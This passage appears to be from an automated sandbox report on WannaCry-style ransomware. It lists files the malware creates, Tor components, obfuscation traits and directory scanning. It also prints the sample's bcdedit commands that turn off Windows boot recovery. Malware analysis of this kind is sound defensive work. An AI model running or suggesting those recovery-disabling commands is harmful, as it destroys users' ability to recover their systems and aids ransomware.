Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\iw\~SD97C2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ja\~SD97C3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ka\~SD97D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km\~SD97D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\kn\~SD97D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ko\~SD97D7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lo\~SD97E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lt\~SD97E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lv\~SD97E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml\~SD97EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mn\~SD97FB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mr\~SD97FC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ms\~SD97FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne\~SD97FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\nl\~SD980E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\no\~SD980F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pl\~SD9810.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_BR\~SD9811.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_PT\~SD9812.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro\~SD9842.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ru\~SD9843.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\si\~SD9844.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sk\~SD9845.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sl\~SD9856.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sr\~SD9857.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sv\~SD9858.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sw\~SD9859.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ta\~SD985A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\te\~SD985B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th\~SD986C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\tr\~SD986D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\uk\~SD986E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ur\~SD986F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\vi\~SD987F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_CN\~SD9880.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_HK\~SD9881.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_TW\~SD9882.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zu\~SD9893.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_metadata\~SD9894.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\~SD9895.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\~SD9896.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\css\~SD9897.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\html\~SD98A7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\~SD98A8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\~SD98A9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\bg\~SD98AA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ca\~SD98BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\cs\~SD98BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\da\~SD98BD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\de\~SD98BE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\el\~SD98BF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en\~SD98D0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB\~SD98D1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es\~SD98D2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es_419\~SD98D3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\et\~SD98D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fi\~SD98D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil\~SD98D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fr\~SD98E6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hi\~SD98E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hr\~SD98E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hu\~SD98E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\id\~SD98EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\it\~SD98EB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ja\~SD98FC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ko\~SD98FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lt\~SD98FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lv\~SD98FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nb\~SD9900.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nl\~SD9901.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pl\~SD9902.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR\~SD9913.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT\~SD9914.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ro\~SD9915.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ru\~SD9916.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sk\~SD9917.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sl\~SD9918.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sr\~SD9919.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sv\~SD9929.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\th\~SD992A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\tr\~SD992B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\uk\~SD992C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\vi\~SD992D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN\~SD992E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW\~SD992F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_metadata\~SD9940.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\~SD9941.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\~SD9942.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\~SD9943.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ar\~SD9944.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\bg\~SD9945.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ca\~SD9955.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\cs\~SD9956.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\da\~SD9957.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\de\~SD9958.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\el\~SD9959.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\en\~SD995A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\es\~SD995B.tmp
May use bcdedit to modify the Windows boot settings
Source: tasksche.exe | Binary or memory string: 4bcdedit.exe_
Command shell drops VBS files
Source: C:\Windows\System32\cmd.exe | File created: C:\ProgramData\ywepvofkuzu108\m.vbs
Creates files in the system32 config directory
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
Drops executables to the Windows directory (C:\Windows) and starts them
Source: C:\mssecsvc.exe | Executable created and started: C:\WINDOWS\tasksche.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\ProgramData\ywepvofkuzu108\u.wnry
Uses bcdedit to modify the Windows boot settings
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code execution: Found new code
PE file contains an invalid checksum
Source: tasksche.exe.3048.dr | Static PE information: real checksum: 0x0 should be: 0x363012
Source: mssecsvc.exe | Static PE information: real checksum: 0x0 should be: 0x394136
Source: tasksche.exe.3216.dr | Static PE information: real checksum: 0x0 should be: 0x363012
PE file contains sections with non-standard names
Source: libeay32.dll.3408.dr | Static PE information: section name: /4
Source: libeay32.dll.3408.dr | Static PE information: section name: /19
Source: libeay32.dll.3408.dr | Static PE information: section name: /31
Source: libeay32.dll.3408.dr | Static PE information: section name: /45
Source: libeay32.dll.3408.dr | Static PE information: section name: /57
Source: libeay32.dll.3408.dr | Static PE information: section name: /70
Source: libeay32.dll.3408.dr | Static PE information: section name: /81
Source: libeay32.dll.3408.dr | Static PE information: section name: /92
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /4
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /19
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /31
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /45
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /57
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /70
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /81
Source: libevent-2-0-5.dll.3408.dr | Static PE information: section name: /92
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /4
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /19
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /31
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /45
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /57
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /70
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /81
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: section name: /92

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
